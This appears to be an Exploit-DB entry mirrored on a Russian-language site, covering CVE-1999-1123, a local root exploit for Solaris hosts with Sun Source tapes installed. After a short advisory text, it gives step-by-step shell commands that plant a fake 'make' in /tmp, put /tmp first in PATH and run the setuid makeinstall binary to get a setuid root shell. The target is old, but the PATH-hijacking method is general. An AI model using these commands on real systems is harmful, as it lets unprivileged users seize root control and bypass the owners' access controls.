- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19042
- Проверка EDB
-
- Пройдено
- Автор
- ANONYMOUS
- Тип уязвимости
- LOCAL
- Платформа
- SOLARIS
- CVE
- cve-1999-1123
- Дата публикации
- 1999-11-23
Код:
source: https://www.securityfocus.com/bid/21/info
This applies to sites that have installed Sun Source tapes
only.
The Sun distribution of sources (sunsrc) has an installation
procedure which creates the directory /usr/release/bin and
installs two setuid root files in it: makeinstall and winstall.
These are both binary files which exec other programs:
"make -k install" (makeinstall) or "install" (winstall) without
a full path or reseting the PATH enviroment variable.
This makes it possible for users on that system to become root.
$ cp /bin/sh /tmp/sh
$ echo chmod 4777 /tmp/sh > /tmp/make
$ chmod a+rx /tmp/make
$ set PATH=/tmp:$PATH
$ export PATH
$ /usr/bin/makeinstall
$ /tmp/sh
#- Источник
- www.exploit-db.com
